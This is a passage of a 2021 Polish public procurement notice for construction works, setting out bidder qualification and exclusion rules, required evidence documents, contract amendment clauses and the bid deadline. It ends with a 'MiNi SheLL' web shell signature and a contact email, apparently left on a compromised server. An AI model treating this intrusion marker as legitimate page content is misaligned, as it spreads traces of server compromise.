na<br/>podstawie wcześniej obowiązujących przepisów;<br/>3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – nie dopuszcza<br/>łącznego spełniania warunku przez wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy<br/>w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>Rozdział VIII SWZ: PODSTAWY WYKLUCZENIA Z POSTĘPOWANIA<br/>1. Z postępowania o udzielenie zamówienia wyklucza się wykonawców, w stosunku do których<br/>zachodzi którakolwiek z okoliczności wskazanych w art. 108 ust. 1 ustawy pzp. Zamawiający nie<br/>przewiduje podstaw wykluczenia z postępowania wskazanych w art. 109 ust. 1 ustawy pzp.<br/>2. Wykluczenie wykonawcy następuje zgodnie z art. 111 ustawy pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do<br/>wykluczenia z postępowania – zgodnie z załącznikiem nr 5 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, porównywalnych z robotami budowlanymi<br/>stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających<br/>czy te roboty budowlane zostały wykonane należycie,<br/>w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - inne odpowiednie dokumenty – według zał. nr 6 do SWZ;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami - zgodnie ze wzorem stanowiącym załącznik nr 7 do<br/>SWZ.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, o ile wykonawca wskazał<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 pzp dane umożliwiające dostęp do tych środków;<br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi<br/>oświadczenia, o którym mowa w art. 125 ust. 1 pzp.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość<br/>i aktualność.<br/>7. W zakresie nieuregulowanym ustawą pzp lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. poz. 2415) oraz Rozporządzenia Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. zobowiązanie innego podmiotu, o którym mowa w Rozdziale X ust. 3 SWZ (jeżeli dotyczy);<br/>2. pełnomocnictwo (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które etapy (części) roboty budowlanej wykonają poszczególni<br/>wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Powyższe określa § 15 wzoru umowy - zał. nr 4 do SWZ, tj.<br/>1. Z zastrzeżeniem wyjątków przewidzianych w niniejszej umowie oraz SWZ, wszelkie zmiany<br/>umowy wymagają pod rygorem nieważności formy pisemnego aneksu, skutecznego po<br/>podpisaniu przez obie Strony.<br/>2. Zamawiający dopuszcza – jeżeli uzna za uzasadnione – możliwość zmiany ustaleń zawartej<br/>umowy w stosunku do treści oferty Wykonawcy, o których mowa w art. 455 ust. 1 pkt 1 ustawy<br/>Pzp,<br/>w następujących przypadkach:<br/>1) zmiany wynagrodzenia Wykonawcy (z uwagi na brak miejsca opis szczegółowy znajduję się<br/>we wzorze umowy),<br/>2) zmiany terminu realizacji zamówienia(z uwagi na brak miejsca opis szczegółowy znajduję się<br/>we wzorze umowy),<br/>3) zmiany technologiczne (z uwagi na brak miejsca opis szczegółowy znajduję się we wzorze<br/>umowy),<br/>4) pozostałe zmiany (z uwagi na brak miejsca opis szczegółowy znajduję się we wzorze<br/>umowy).<br/>3. Zamawiający poza możliwością zmian, o których mowa w ust. 2 może również dokonać zmian<br/>umowy w zakresie wynagrodzenia i/lub terminu realizacji zamówienia, w szczególności w niżej<br/>wymienionych przypadkach i po uzasadnieniu spełnienia okoliczności szczegółowo opisanych:<br/>1) w art. 455 ust. 1 pkt 2 ustawy Pzp;<br/>2) w art. 455 ust. 1 pkt 3 ustawy Pzp;<br/>3) w art. 455 ust. 1 pkt 4 ustawy Pzp;<br/>4) w art. 455 ust. 2 ustawy Pzp.<br/>Wynagrodzenie za ww. roboty określone zostanie w oparciu o sporządzone przez Wykonawcę i<br/>zweryfikowane przez Zamawiającego kosztorysy. Do rozliczenia ww. prac będą stosowane ceny<br/>i składniki<br/>cenotwórcze wynikające z kosztorysu ofertowego. W przypadku braku w/wym. ceni składników<br/>zastosowane zostaną pozycje kosztorysowe na podstawie KNR-ów i nie wyższe niż niskie ceny<br/>w/g wydawnictwa INTERCENBUD obowiązującego w danym okresie rozliczeniowym<br/>(INTERCENBUD - w zakresie cen materiałów i sprzętu)/ceny rynkowe obowiązujące w okresie<br/>rozliczeniowym/ceny uzgodnione po przeprowadzonych negocjacjach.<br/>4. W przypadku wystąpienia okoliczności, o których mowa w niniejszym paragrafie,<br/>Zamawiającemu przysługuje prawo do zmiany ustaleń zawartej umowy w zakresie, który uzna za<br/>uzasadniony. Zmiana dokonana zostanie w formie aneksu do umowy.<br/>5. Strony umowy, zgodnie z art. 15r ust. 1 – 3 ustawy z dnia 2 marca 2020 r. o szczególnych<br/>rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19,<br/>innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U. poz. 1842, z późn.<br/>zm.), niezwłocznie, wzajemnie informują się o wpływie okoliczności związanych z wystąpieniem<br/>COVID-19 na należyte wykonanie umowy, o ile taki wpływ wystąpił lub może wystąpić.<br/>Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19 wpływają na<br/>należyte wykonanie umowy w uzgodnieniu z Wykonawcą dokonuje zmiany umowy w<br/>szczególności przez:<br/>1) zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania<br/>umowy lub jej części, przy czym termin wykonania umowy może zostać zmieniony o liczbę dni<br/>odpowiadającą okresowi opóźnienia wywołanego okolicznościami związanymi z wystąpieniem<br/>COVID-19;<br/>2) zmianę sposobu wykonywania umowy;<br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia<br/>wykonawcy -<br/>o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości<br/>pierwotnej umowy.<br/>W przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID-19 mogą wpłynąć<br/>na należyte wykonanie umowy Zamawiający, w uzgodnieniu z Wykonawcą, może dokonać<br/>zmiany umowy.<br/>6. Postanowienie ust. 5 ma zastosowanie także do analogicznych do opisanych w ust. 5 sytuacji<br/>kryzysowych, wywołanych okolicznościami innymi niż COVID-19, które wpływają lub mogą<br/>wpłynąć na należyte wykonanie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/wug</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com